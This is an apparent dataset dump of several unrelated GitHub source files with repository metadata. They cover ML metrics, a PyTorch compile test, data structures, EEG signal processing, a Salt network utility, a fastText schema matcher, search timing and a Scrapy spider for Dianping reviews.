# Normalize value of each latent dimension with its maximal deviation.\n normalized_deviations = cum_deviations / max_deviations[:, np.newaxis]\n irs_matrix = 1.0 - normalized_deviations\n disentanglement_scores = irs_matrix.max(axis=1)\n if np.sum(max_deviations) > 0.0:\n avg_score = np.average(disentanglement_scores, weights=max_deviations)\n else:\n avg_score = np.mean(disentanglement_scores)\n\n parents = irs_matrix.argmax(axis=1)\n score_dict = {}\n score_dict[\"disentanglement_scores\"] = disentanglement_scores\n score_dict[\"avg_score\"] = avg_score\n score_dict[\"parents\"] = parents\n score_dict[\"IRS_matrix\"] = irs_matrix\n score_dict[\"max_deviations\"] = max_deviations\n return score_dict\n","repo_name":"google-research/disentanglement_lib","sub_path":"disentanglement_lib/evaluation/metrics/irs.py","file_name":"irs.py","file_ext":"py","file_size_in_byte":4620,"program_lang":"python","lang":"en","doc_type":"code","stars":1328,"dataset":"github-code","pt":"52"} +{"seq_id":"74532316644","text":"import torch\nimport torchvision.models as models\nimport torch._dynamo as torchdynamo\nimport copy\nfrom torch.ao.quantization.quantize_pt2e import prepare_pt2e, convert_pt2e\nimport torch.ao.quantization.quantizer.x86_inductor_quantizer as xiq\nfrom torch.ao.quantization.quantizer.x86_inductor_quantizer import X86InductorQuantizer\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\nimport random\nimport numpy as np\nfrom torch._export import capture_pre_autograd_graph, dynamic_dim\nimport os\nimport torch.nn as nn\n\nrandom.seed(2023)\ntorch.manual_seed(2023)\nnp.random.seed(2023)\nclass SingleConv2dModule(torch.nn.Module):\n def __init__(self, ) -> None:\n super().__init__()\n self.conv = nn.Conv2d(3, 6, (2, 2), stride=(1, 1), padding=(1, 1))\n self.relu = torch.nn.ReLU()\n\n def forward(self, x):\n x = self.relu(x)\n return self.conv(x)\n\ndef test():\n model_name = \"resnet50\"\n torch._dynamo.config.verbose = True\n torch._inductor.config.trace.enabled = True\n torch._inductor.config.trace.debug_log = True\n torch._inductor.config.debug = True\n torch._inductor.config.freezing = True\n torch._dynamo.config.assume_static_by_default = False\n torch._dynamo.config.automatic_dynamic_shapes = True\n\n print(\"start fp32 test of model: {}\".format(model_name), flush=True)\n\n # model = models.__dict__[model_name](pretrained=True).eval()\n model = SingleConv2dModule().eval()\n x = torch.randn(17, 3, 224, 224).contiguous(memory_format=torch.channels_last)\n example_inputs = (x,)\n # export_with_dynamic_shape_list = [True, False]\n export_with_dynamic_shape_list = [True,]\n for export_with_dynamic_shape in export_with_dynamic_shape_list:\n os.system(\"rm -rf /home/leslie/quantization/torch_script/inductor/int8/test_new_export_api/torch_compile_debug/*\")\n os.system(\"rm -rf /tmp/torchinductor_root/*\")\n\n with torch.no_grad():\n # Lower into Inductor\n # optimized_model = torch.compile(model)\n optimized_model = torch.compile(model, dynamic=True)\n\n print(\"---- start first run ----\", flush=True)\n optimized_model(x)\n # print(\"---- start second run ----\", flush=True)\n # optimized_model(x)\n # print(\"---- start second run ----\", flush=True)\n # optimized_model(x)\n # print(\"---- start second run ----\", flush=True)\n # optimized_model(x)\n # print(\"---- start run with changed bs less ----\", flush=True)\n # x2 = torch.randn(8, 3, 224, 224).contiguous(memory_format=torch.channels_last)\n # optimized_model(x2)\n\n # print(\"---- start run with changed bs more ----\", flush=True)\n # x3 = torch.randn(34, 3, 224, 224).contiguous(memory_format=torch.channels_last)\n # optimized_model(x3)\n\n print(\"Finish fp32 test of model: {}\".format(model_name), flush=True)\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"leslie-fang-intel/torch_script","sub_path":"inductor/int8/test_new_export/single_conv/test_new_export_api_dynamic_shape_fp32.py","file_name":"test_new_export_api_dynamic_shape_fp32.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"23373715255","text":"from listNode import ListNode\n\n\nclass LinkedListBasic:\n def __init__(self):\n self.__head = ListNode(\"dummy\", None)\n self.__numItems = 0\n\n # [알고리즘 5-2] 구현: 연결 리스트에 요소 삽입하기 (더미 ��드를 두는 대표 버전)\n def insert(self, i: int, newItem):\n if i >= 0 and i <= self.__numItems:\n prev = self.__getNode(i - 1)\n newNode = ListNode(newItem, prev.next)\n prev.next = newNode\n self.__numItems += 1\n else:\n print(\"index\", i, \": out of bound in insert()\") # 필요시 에러 처리\n\n def append(self, newItem):\n prev = self.__getNode(self.__numItems - 1)\n newNode = ListNode(newItem, prev.next)\n prev.next = newNode\n self.__numItems += 1\n\n # [알고리즘 5-3] 구현: 연결 리스트의 요소 삭제하기\n def pop(self, i: int = 0): # i번 노드 삭제. 고정 파라미터 (기본값 0)\n if i >= 0 and i <= self.__numItems - 1:\n prev = self.__getNode(i - 1)\n curr = prev.next\n prev.next = curr.next\n retItem = curr.item\n self.__numItems -= 1\n return retItem\n else:\n return None\n\n # [알고리즘 5-4] 구현: 연결 리스트의 요소 x 삭제하기 (더미 헤드를 두는 대표 버전)\n def remove(self, x):\n (prev, curr) = self.__findNode(x)\n if curr is not None: # curr != None\n prev.next = curr.next\n self.__numItems -= 1\n return x\n else:\n return None\n\n # [알고리즘 5-5] 구현: 연결 리스트의 i번 요소 알려주기\n def get(self, i: int):\n if self.isEmpty():\n return None\n if i >= 0 and i <= self.__numItems - 1:\n return self.__getNode(i).item\n else:\n return None\n\n # [알고리즘 5-7] 구현: x가 연결 리스트의 몇 번째 요소인지 알려주기\n def index(self, x) -> int:\n curr = self.__head.next # 0번 노드: 더미 헤드의 다음 노드\n for i in range(self.__numItems):\n if curr.item == x:\n return i\n else:\n curr = curr.next\n return -2 # 사용하지 않는 인덱스\n\n # [알고리즘 5-8] 구현: 기타 작업들\n def isEmpty(self) -> bool:\n return self.__numItems == 0\n\n def size(self) -> int:\n return self.__numItems\n\n def clear(self):\n self.__head = ListNode(\"dummy\", None)\n self.__numItems = 0\n\n def count(self, x) -> int:\n cnt = 0\n curr = self.__head.next # 0번 노드\n while curr is not None: # curr != None\n if curr.item == x:\n cnt += 1\n curr = curr.next\n return cnt\n\n def extend(self, a): # 여기서 a는 self와 같은 타입의 리스트\n for i in range(a.size()):\n self.append(a.get(i))\n\n def copy(self):\n a = LinkedListBasic()\n for i in range(self.__numItems):\n a.append(self.get(i))\n return a\n\n def reverse(self):\n a = LinkedListBasic()\n for i in range(self.__numItems):\n a.insert(0, self.get(i))\n self.clear()\n for i in range(a.size()):\n self.append(a.get(i))\n\n def sort(self) -> None:\n a = []\n for i in range(self.__numItems):\n a.append(self.get(i))\n a.sort()\n self.clear()\n for i in range(len(a)):\n self.append(a[i])\n\n def __findNode(self, x) -> (ListNode, ListNode):\n prev = self.__head # 더미 헤드\n curr = prev.next # 0번 노드\n while curr is not None: # curr != None\n if curr.item == x:\n return (prev, curr)\n else:\n prev = curr\n curr = curr.next\n return (None, None)\n\n # [알고리즘 5-6] 구현: 연결 리스트의 i번째 노드 알려주기\n def __getNode(self, i: int) -> ListNode:\n curr = self.__head # 더미 헤드, index: -1\n for i in range(i + 1):\n curr = curr.next\n return curr\n\n def printList(self):\n curr = self.__head.next # 0번 노드: 더미 헤드 다음 노드\n while curr is not None: # curr != None\n print(curr.item, end=\" \")\n curr = curr.next\n print()\n","repo_name":"anifilm/study","sub_path":"learn_data_structures/easy_data_structures_python/chap05/linkedListBasic.py","file_name":"linkedListBasic.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"46109700168","text":"# Pan and Xian's code\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport ast\nfrom scipy.stats import kurtosis\nimport bandFilter \n\n\n\nfs=1000\n\n# From Jiuqi Xian's code\n\"\"\"\npurpose: parse raw data/label file, return data as numpy array\n\"\"\"\n\ndef parse_file(dataFileName):\n f=open(dataFileName)\n strL=f.read()\n l=ast.literal_eval(strL)\n return np.array(l)\ndef plotData(data):\n plt.plot(x[0] for x in data)\n\"\"\"\npurpose: find the indeces of trails that possibly contaminated by eyeblinks\n\"\"\"\ndef eyeblink_identifier(brainwave_vec, window_interval,num_of_trials, moving_step, rejection_std):\n kurtosis_vec = np.array([])\n idx =0\n while (idx < brainwave_vec.size-window_interval):\n np.append(kurtosis, kurtosis(brainwave_vec[idx:idx+window_interval]))\n idx += moving_step\n kurtosis_thres = np.mean(kurtosis_vec)+ rejection_std*np.std(kurtosis_vec)\n bad_kurtosis_index = kurtosis_vec > kurtosis_thres\n \n num_windows_per_trial = (brainwave_vec.size-window_interval)/ moving_step+1\n bad_trial_index = []\n \n for i in range(0,kurtosis_vec.size):\n if (bad_kurtosis_index[i] == True):\n bad_train_index.append(np.floor(i/(1.0*num_windows_pertrial)))\n \n return np.unique(bad_trial_index)\n\n\"\"\"\npurpose: find the indices of trials that have bad connection\n\"\"\"\n\ndef bad_connection_identifier(stimuli_per_trial,num_of_trials, connection_quality_vec,rejection_rate):\n bad_trial_index =[]\n for i in range(0, num_of_trials-1):\n bad_sum = 0\n for j in range(i*stimuli_per_trial,(i+1)*stimuli_per_trial):\n if (connection_quality_vec[j] > tres):\n bad_sum += 1\n if (bad_sum/(1.0)*stimuli_per_trial > rejection_rate):\n bad_trial_index.append(i)\n \n return np.array(bad_trial_index)\n \n \n \n# From Hongyi Pan's code \n\n\nf=\"signal_data/signal03_11_2019__10_57_39.txt\" #signal data\ng=\"stimuli_data/stimuli03_11_2019__10_57_39.txt\" #stimuli stamp\n\n#signalFile format: (outputlevel, timestamp, quality)\n#stimuliFile format: (pictureIndex,condition,timestamp)\n#output format: 2d tuple with each elment as a sample, each sample a point of signalFile format\n#scopePre and scopePost are the seconds before/after included in the sample\ndef sync( signalFile, stimuliFile, scopePre, scopePost):\n f=parse_file(signalFile)\n g=parse_file(stimuliFile)\n trials_signal=[]\n trials_stimuli=[]\n temp=[]\n \n trial_len=int((scopePre+scopePost)*fs)\n j=0\n for i in g:\n temp=[]\n \n while ji[2]+scopePre and f[j][1]=i[2]+scopePost:\n break\n j+=1\n\n if len(temp)>trial_len:\n temp=temp[:trial_len]\n for h in range(len(temp)+1, trial_len+1):\n temp.append(f[h])\n #print(len(temp))\n trials_signal.append(temp)\n trials_stimuli.append(i[1])\n\n #print(len(trials_signal))\n return trials_signal, trials_stimuli\n\n#Test\n#res=sync(f,g,-0.2,1)\n\n#sig=[x[0] for x in res[0]]\n\n#plt.plot(bandFilter.shiftMeanTo0(sig))\n#plt.show()\n\n#def getLabel(stimuliFile):\n# out=[]\n# g=parse_file(stimuliFile)\n# for x in g:\n# out.append(int(x[1]))\n# return out\n\n#Test\n#print(getLabel(g))","repo_name":"rarerare/BCI_speller","sub_path":"raw_signal_processing.py","file_name":"raw_signal_processing.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"43367858402","text":"import sys\nimport gzip\nimport numpy as np\nimport pandas as pd\nimport difflib as dl\nimport matplotlib.pyplot as plt\nfrom math import cos, asin, sqrt\n\n\n# dataframes containing weather stations and cities\ndf_stations = pd.DataFrame()\ndf_cities = pd.DataFrame()\n\n# output file name\nout_svg = ''\n\n\ndef read_data():\n \"\"\" Return the data from text and csv files \"\"\"\n if len(sys.argv) >= 4:\n # read output file name\n global out_svg\n global df_cities\n global df_stations\n out_svg = sys.argv[3]\n # read gzip file\n station_fh = gzip.open(sys.argv[1], 'rt', encoding='utf-8')\n df_stations = pd.read_json(station_fh, lines=True)\n # read csv file\n df_cities = pd.read_csv(sys.argv[2])\n else:\n print('Unable to read input files:')\n print(\"\\tThere must be three arguments: 2 input file names (gzip and csv) and 1 output file name (svg)\")\n sys.exit()\n\n\ndef clean_data():\n \"\"\" Clean station and cities data \"\"\"\n # change 'avg_tmax' to celsius by dividing by 10\n global df_stations\n global df_cities\n df_stations['avg_tmax'] = df_stations['avg_tmax'] / 10\n\n # dropping NaN values in 'population' or 'area'\n df_cities = df_cities.dropna(how='any')\n\n # convert 'area' from m^2 to km^2\n df_cities['area'] = df_cities['area'] / 10**6\n\n # exclude cities with area greater than 10000 km^2\n df_cities = df_cities[df_cities['area'] <= 10000]\n\n\ndef distance(lat1, lon1, lat2, lon2):\n \"\"\" Return the distance between two points based on their latitudes and longitudes (Haversine formula)\"\"\"\n # taken from:\n # https://stackoverflow.com/questions/27928/calculate-distance-between-two-latitude-longitude-points-haversine-formula/21623206\n p = 0.017453292519943295 # Pi/180\n a = 0.5 - cos((lat2 - lat1) * p) / 2 + cos(lat1 * p) * \\\n cos(lat2 * p) * (1 - cos((lon2 - lon1) * p)) / 2\n return 12742 * asin(sqrt(a)) # 2*R*asin... (in kilometers)\n\n\ndef get_avg_tmax_from_closest_station(city):\n \"\"\" Get 'avg_tmax' from the closest weather station to the city \"\"\"\n vectorized_distance = np.vectorize(distance, otypes=[np.float])\n distance_list = vectorized_distance(\n city['latitude'], city['longitude'], df_stations['latitude'], df_stations['longitude'])\n # find the index of the closest station to the city\n min_idx = np.argmin(distance_list)\n return df_stations.iloc[min_idx]['avg_tmax']\n\n\ndef plot_data(x, y):\n \"\"\" draw plots to an svg file\"\"\"\n plt.figure(figsize=(16, 8)) # change the size to something sensible\n plt.subplot(1, 2, 1) # subplots in 1 row, 2 columns, select the first\n # plt.plot(data1['views'].values)\n plt.plot(x, y, 'b .')\n plt.title('Temperature vs Population Density')\n plt.ylabel('Population Density (people/km\\u00b2)')\n plt.xlabel('Avg Max Temperature (\\u00b0C)')\n plt.savefig(out_svg)\n # plt.show()\n\n\ndef main():\n \"\"\" Main function \"\"\"\n read_data()\n clean_data()\n\n # add 'avg_tmax' for each city to the dataframe\n df_cities['avg_tmax'] = df_cities.apply(\n get_avg_tmax_from_closest_station, axis=1)\n # calculate density and add to the dataframe\n df_cities['density'] = df_cities['population'] / df_cities['area']\n plot_data(df_cities['avg_tmax'], df_cities['density'])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"KayTheGuy/data-science-in-python","sub_path":"EX4/temperature_correlation.py","file_name":"temperature_correlation.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13323571286","text":"import socket\n\ndef isportopen(host, port):\n '''\n Return status of a port\n\n CLI Example::\n\n salt '*' network.isportopen 127.0.0.1 22\n '''\n\n if not (1 <= int(port) <= 65535):\n return False\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n out = sock.connect_ex((_sanitize_host(host), int(port)))\n\n return out\n\n\ndef host_to_ip(host):\n '''\n Returns the IP address of a given hostname\n\n CLI Example::\n\n salt '*' network.host_to_ip example.com\n '''\n try:\n ip = socket.gethostbyname(host)\n except Exception:\n ip = None\n return ip\n\ndef ip_to_host(ip):\n '''\n Returns the hostname of a given IP\n\n CLI Example::\n\n salt '*' network.ip_to_host 8.8.8.8\n '''\n try:\n hostname, aliaslist, ipaddrlist = socket.gethostbyaddr(ip)\n except Exception:\n hostname = None\n return hostname\n","repo_name":"autumnw/saltswift","sub_path":"salt/salt/utils/socket_util.py","file_name":"socket_util.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22052204342","text":"\"\"\"\r\nGet a path to XSD files in ORE convention and the name of the candidate schema file.\r\nRun data description similarity between each of the XSD schemas to the target, return the result of a first line matcher\r\nin ORE's CSV format Using the radius measure\r\n\"\"\"\r\n\r\n\r\nimport xml.etree.ElementTree as ET\r\nimport gensim.downloader as api\r\nfrom gensim.models import KeyedVectors\r\nfrom gensim.models import Word2Vec\r\nfrom flair.data import Sentence, Label\r\nfrom flair.data_fetcher import NLPTaskDataFetcher, NLPTask\r\nfrom flair.embeddings import TokenEmbeddings, WordEmbeddings, StackedEmbeddings, CharLMEmbeddings, FlairEmbeddings\r\nfrom typing import List\r\nimport torch\r\nfrom flair.models import SequenceTagger\r\nimport re\r\nimport numpy as np\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import WhitespaceTokenizer\r\nfrom nltk import download\r\nfrom gensim.models import Word2Vec, KeyedVectors\r\nimport math\r\nfrom sklearn import preprocessing\r\nimport csv\r\nimport os\r\nimport sys\r\nfrom lxml import etree\r\nfrom csv import reader\r\n\r\nimport fasttext\r\nimport fasttext.util\r\nmodel = fasttext.load_model('/home/kobyb/fastText/cc.en.300.bin')\r\nmodel.get_dimension()\r\nimport numpy as np\r\nfrom numpy import linalg as LA\r\nfrom numpy.linalg import norm\r\n\r\nfast_vocab = model.words\r\n\r\nwmv_model = KeyedVectors.load_word2vec_format(\"oceanic_300_word2vec.bin\", binary=True)\r\nwmv_model.init_sims(replace=True) # Normalizes the vectors in the word2vec class.\r\nprint(wmv_model['phytoplankton'])\r\n\r\nword_vectors = wmv_model.wv\r\nvocab = word_vectors.vocab\r\n\r\n# get schema from pangea XML file\r\ndef get_schema(xml_file):\r\n # get schema from xml file\r\n current_schema = []\r\n xml_tree = ET.parse(xml_file)\r\n xml_root = xml_tree.getroot()\r\n for parameter_name in xml_root.findall(prefix+'matrixColumn/'+prefix+'parameter/'+prefix+'name'):\r\n current_schema.append(parameter_name.text)\r\n return current_schema\r\n\r\n# get data description from pangea XML file\r\ndef get_data_description(xml_file):\r\n # get data description from XML file.\r\n # The description in pangea API is given under the tag 'matrixColumn' for each parameter\r\n current_description = []\r\n xml_tree = ET.parse(xml_file)\r\n xml_root = xml_tree.getroot()\r\n for matrix_column in xml_root.findall(prefix + 'matrixColumn'):\r\n parameter_description = ''\r\n num_of_params = 0\r\n ignore_flag = False\r\n for parameter_tag in matrix_column.findall('.//'):\r\n #print(parameter_tag)\r\n if num_of_params > 0 and ignore_flag is False:\r\n # parameter_description += ', '\r\n parameter_description += ' '\r\n if parameter_tag.text != '\\n' and parameter_tag.text != '':\r\n parameter_description += parameter_tag.text\r\n num_of_params += 1\r\n ignore_flag = False\r\n else:\r\n ignore_flag = True\r\n current_description.append(parameter_description)\r\n return current_description\r\n\r\ndef get_ore_schema_xsd_element(xsd_file_path):\r\n # get schema from ORE XSD file\r\n with open(xsd_file_path, 'r', encoding='utf-8') as f:\r\n xsd_ele = etree.parse(f)\r\n return xsd_ele\r\n\r\ndef schema_names(xsd_ele):\r\n names = xsd_ele.xpath(\"//xs:element/@name\", namespaces=namespaces)\r\n return names\r\n\r\ndef schema_descriptions(xsd_ele):\r\n descriptions = xsd_ele.xpath(\"//xs:element/@description\", namespaces=namespaces)\r\n return descriptions\r\n\r\ntorch.device('cuda')\r\n\r\nstop_words = stopwords.words('english')\r\nprefix = 'http://www.w3.org/2001/XMLSchema'\r\nnamespaces = {\"xs\": \"http://www.w3.org/2001/XMLSchema\"}\r\n\r\ncandidate_files = []\r\n# tar_file_name = 'my_target.xsd'\r\ntar_file_name = 'user_target.xsd'\r\n# ore_path = 'ore_xsd'\r\n# ore_path = 'pangea/ore_format/'\r\nore_path = 'pangea/ore_format/240421/'\r\ndirectory = os.fsencode(ore_path)\r\nfor file in os.listdir(directory):\r\n filename = os.fsdecode(file)\r\n if filename.endswith(tar_file_name):\r\n tar_file_name = filename\r\n elif filename.endswith(\".xsd\"):\r\n candidate_files.append(filename)\r\n\r\ncandidate_schemas = []\r\ncandidate_descriptions = []\r\nfor cand_file_name in candidate_files:\r\n cand_xsd = get_ore_schema_xsd_element(ore_path + '/' + cand_file_name)\r\n cand_schema = schema_names(cand_xsd)\r\n candidate_schemas.append(cand_schema)\r\n cand_description = schema_descriptions(cand_xsd)\r\n candidate_descriptions.append(cand_description)\r\n\r\ntarget_xsd = get_ore_schema_xsd_element(ore_path + '/' + tar_file_name)\r\ntarget_schema = schema_names(target_xsd)\r\ntarget_description = schema_descriptions(target_xsd)\r\n\r\n# print(candidate_descriptions[0])\r\ndef clean_desc(desc_list):\r\n # remove words that aren't in the vocabulary\r\n # desc = ' '.join(desc_list)\r\n # tok = WhitespaceTokenizer().tokenize(desc)\r\n word_list = []\r\n for word in desc_list:\r\n if word in word_vectors.vocab:\r\n word_list.append(word)\r\n # remove duplicates\r\n a = list(set(word_list))\r\n # return word_list\r\n return a\r\n\r\ndef centroid(sentence):\r\n words_vec = []\r\n words = WhitespaceTokenizer().tokenize(sentence)\r\n n = len(words)\r\n # for word in words:\r\n # words_vec.append(model.get_word_vector(word))\r\n # if word in wmv_model.vocab:\r\n # words_vec.append(wmv_model[word])\r\n for word in words:\r\n if word in fast_vocab:\r\n words_vec.append(model.get_word_vector(word))\r\n ## words_vec.append(model.get_word_vector(word))\r\n # if word in wmv_model.vocab:\r\n # words_vec.append(wmv_model[word])\r\n words_sum = np.sum(words_vec, axis=0)\r\n centroid = words_sum / n\r\n return centroid\r\n\r\ndef cluster_radius(w_vec, centroid):\r\n # print('cluster_radius')\r\n # print('words_vec: ',words_vec)\r\n # print('centroid: ', centroid)\r\n n = len(w_vec)\r\n words_vec = getVectorListFromWords(w_vec)\r\n try:\r\n radii_sum = np.sqrt((1 / n) * np.sum(np.square(1 - np.dot(words_vec, centroid) / (LA.norm(words_vec) * LA.norm(centroid))),axis=0))\r\n except ZeroDivisionError:\r\n return 1\r\n return radii_sum\r\n\r\ndef cosine_sim(A,B):\r\n return np.dot(A,B)/(norm(A)*norm(B))\r\n\r\ndef clusters_radius_measure(radii_sum1, radii_sum2):\r\n r = np.abs(radii_sum1 - radii_sum2)\r\n if np.isnan(r).any():\r\n r = 1.0\r\n return r\r\n\r\ndef elements_radius(centroid1, centroid2):\r\n r = 1 - cosine_sim(centroid1,centroid2)\r\n if np.isnan(r).any():\r\n r = 1.0\r\n return r\r\n\r\ndef getVectorListFromWords(words):\r\n words_vec = []\r\n for word in words:\r\n words_vec.append(model.get_word_vector(word))\r\n # if word in wmv_model.vocab:\r\n # words_vec.append(wmv_model[word])\r\n for word in words:\r\n if word in model.words:\r\n words_vec.append(model.get_word_vector(word))\r\n words_vec.append(model.get_word_vector(word))\r\n return words_vec\r\n\r\ndef compute_radius(text1, text2):\r\n # compute the radius measure according to a fasttext word embeddings.\r\n # t_text1 = WhitespaceTokenizer().tokenize(text1)\r\n # t_text2 = WhitespaceTokenizer.tokenize(text2)\r\n centroid1 = centroid(text1)\r\n centroid2 = centroid(text2)\r\n return elements_radius(centroid1, centroid2)\r\n\r\ndef compute_radius_clusters(text1, text2):\r\n # compute the radius measure for cousters according to a fasttext word embeddings.\r\n # t_text1 = WhitespaceTokenizer().tokenize(text1)\r\n # t_text2 = WhitespaceTokenizer.tokenize(text2)\r\n centroid1 = centroid(text1)\r\n cr1 = cluster_radius(getVectorListFromWords(text1), centroid1)\r\n centroid2 = centroid(text2)\r\n cr2 = cluster_radius(getVectorListFromWords(text2), centroid2)\r\n return clusters_radius_measure(cr1, cr2)\r\n\r\ndef compute_r_clusters_from_vectors(w_vector1, w_vector2, c1, c2):\r\n cr1 = cluster_radius(w_vector1, c1)\r\n cr2 = cluster_radius(w_vector2, c2)\r\n return clusters_radius_measure(cr1, cr2)\r\n\r\ndef compute_distance(text1, text2):\r\n # compute the distance between the text according to fasttext word embeddings\r\n centroid1 = centroid(text1)\r\n centroid2 = centroid(text2)\r\n r = cosine_sim(centroid1,centroid2)\r\n if np.isnan(r).any():\r\n r = 0.0\r\n return r\r\n\r\ndef centroid_radius(c1, c2):\r\n return 1 - cosine_sim(c1,c2)\r\n\r\ndef compute_sim_matrix(input_list, target_list):\r\n # compute similarity matrix for 2 data description lists.\r\n # return numpy array of similarities (1st line matcher)\r\n sim_matrix = []\r\n for input_attribute in input_list:\r\n row_value = []\r\n for output_attribute in target_list:\r\n if input_attribute == '' or output_attribute == '' or input_attribute is None or output_attribute is None:\r\n row_value.append(1.0)\r\n else:\r\n # dist = compute_radius(input_attribute, output_attribute)\r\n # dist = compute_radius_clusters(input_attribute, output_attribute)\r\n dist = compute_distance(input_attribute, output_attribute)\r\n row_value.append(dist)\r\n sim_matrix.append(row_value)\r\n arr = np.array(sim_matrix)\r\n return arr\r\n\r\ndef write_sim_matrix(cand_file_name, cand, target, sim):\r\n cand_onto_name = cand_file_name.strip('.xsd')\r\n target_onto_name = tar_file_name.strip('.xsd')\r\n with open(ore_path + '/' + cand_onto_name + '2' + target_onto_name + '.csv', 'w', newline='') as f:\r\n writer = csv.writer(f)\r\n for i in range(len(cand)):\r\n cand_element_name = cand_onto_name + '.' + cand[i]\r\n for j in range(len(target)):\r\n target_element_name = target_onto_name + '.' + target[j]\r\n writer.writerow([cand_element_name, target_element_name, sim[i, j]])\r\n\r\n","repo_name":"barkoby/DDE","sub_path":"FLM/radius_matcher.py","file_name":"radius_matcher.py","file_ext":"py","file_size_in_byte":9733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41876509123","text":"import datetime\n\ndef buscaSequencial(vetor, elemento):\n for i in range(len(vetor)):\n if elemento == vetor[i]:\n return vetor[i]\n break\n\ndef buscaBinaria(vetor, elemento):\n inicio = 0\n fim = len(vetor)-1\n meio = (inicio + fim)//2\n while inicio <= fim:\n if elemento == vetor[meio]:\n return meio\n elif elemento > vetor[meio]:\n inicio = meio + 1\n else:\n fim = meio - 1\n meio = (inicio + fim)//2\n return -1\n\ndef testeDesempenhoSequencial(razao):\n print(\"\\n\\nImpressão de tempo de Busca Sequencial\")\n vetor = []\n while razao <= 100000000:\n print(\"Vetor com %d elementos: \" % razao)\n for i in range(razao):\n vetor.append(i)\n inicio = datetime.datetime.now()\n buscaSequencial(vetor, razao)\n fim = datetime.datetime.now()\n print(fim-inicio)\n razao *= 10\n\ndef testeDesempenhoBinario(razao):\n vetor = []\n print(\"\\n\\nImpressão de tempo de Busca Binária\")\n while razao <= 100000000:\n print(\"Vetor com %d elementos: \" % razao)\n for i in range(razao):\n vetor.append(i)\n inicio = datetime.datetime.now()\n buscaBinaria(vetor, razao)\n fim = datetime.datetime.now()\n print(fim-inicio)\n razao *= 10\n\ntesteDesempenhoSequencial(10)\ntesteDesempenhoBinario(10)","repo_name":"Mdslino/Estrutura-de-Dados","sub_path":"TP05/Busca.py","file_name":"Busca.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2183490517","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport json\nfrom scrapy import Selector\nfrom scrapy.selector import Selector\nfrom DZspider import items\n# from ..items import DzspiderItem\n\n\nclass DzdpSpider1Spider(scrapy.Spider):\n name = 'dzdp_spider1'\n allowed_domains = ['dianping.com']\n start_urls = ['http://www.dianping.com/jiazhuang/shop/ajax/designreviewlist?_nr_force=1594719433708&act=getreviewlist&shopid=H105G4DfcfUPizLC&tab=all&order=&page=1']\n comment_id = 0\n # start_urls = ['http://www.dianping.com/shop/H105G4DfcfUPizLC/review_all/p3']\n def parse(self, response):\n # print(response.body)\n data = json.loads(response.body)\n # with open('a.html', 'wb') as f:\n # f.write(response.body)\n # print(data)\n searches = Selector(text=data['msg']).xpath('//div[@class=\"comment-list\"]/ul/li')\n for search in searches:\n # print(search)\n item = items.DzspiderItem()\n comments = search.xpath('.//div[@class=\"comment-rst\"]/span/text()').extract()\n construction = comments[0].split(':')[-1]\n service = comments[1].split(':')[-1]\n design = comments[2].split(':')[-1]\n item['username'] = search.xpath('.//div[@class=\"user-name\"]/p/a/text()').extract_first()\n item['construction'] = construction\n item['service'] = service\n item['design'] = design\n content = search.xpath('.//div[@class=\"desc J_brief-cont\"]/text()').extract()[0]\n item['content'] = content.strip() + \";\"\n item['style'] = search.xpath('.//ul[@class=\"cmt-order-info\"]/li/text()').extract()[0]\n item['area'] = search.xpath('.//ul[@class=\"cmt-order-info\"]/li/text()').extract()[1]\n item['cost'] = search.xpath('.//ul[@class=\"cmt-order-info\"]/li/text()').extract()[2]\n item['designer'] = search.xpath('.//ul[@class=\"cmt-order-info\"]/li/text()').extract()[3]\n item['leader'] = search.xpath('.//ul[@class=\"cmt-order-info\"]/li/text()').extract()[4]\n item['contract'] = search.xpath('.//ul[@class=\"cmt-order-info\"]/li/text()').extract()[5]\n imgURLs = search.xpath('.//div[@class=\"shop-photo\"]//ul//a/img/@src').extract()\n item['imgURLs'] = ';\\n'.join(imgURLs)\n item['time'] = search.xpath('.//div[@class=\"misc-info\"]/span/text()').extract_first().replace(u'\\xa0', u' ')\n # print('^' * 30, item['imgURLs'])\n yield item\n\n pageNum = 3\n for page in range(2, pageNum):\n url = 'http://www.dianping.com/jiazhuang/shop/ajax/designreviewlist?_nr_force=1594719433708&act=getreviewlist&shopid=H105G4DfcfUPizLC&tab=all&order=&page={}'.format(page)\n yield scrapy.Request(url, callback=self.parse)\n\n\n\n\n\n\n '''\n r = response.xpath('//div[@class=\"review-words\"]/text()').extract()\n print('&'*30, r)\n\n # print('*' * 30)\n data = json.loads(response.body)\n # with open('dadp.html', 'wb') as f:\n # f.write(data['msg'].encode())\n \n results = Selector(text=data['msg']).xpath(\"//div[@class='comment-list']/ul/li\")\n print(len(results))\n for result in results:\n name = result.xpath('.//p[@class=\"name\"]//text()').extract()\n name = ''.join(name).strip().replace('\\n', ';').replace('\\r', ';')\n\n score = result.xpath('.//div[@class=\"comment-rst\"]//text()').extract()\n score = ''.join(score).strip().replace('\\n', ';').replace('\\r', ';')\n\n content = result.xpath('.//div[@class=\"comment-txt\"]//text()').extract()\n content = ''.join(content).strip().replace('\\n', ';').replace('\\r', ';')\n\n order_info = result.xpath('.//ul[@class=\"cmt-order-info\"]//text()').extract()\n order_info = ''.join(order_info).strip().replace('\\n', ';').replace('\\r', ';')\n\n date = result.xpath('.//span[@class=\"time\"]/text()').get()\n \n 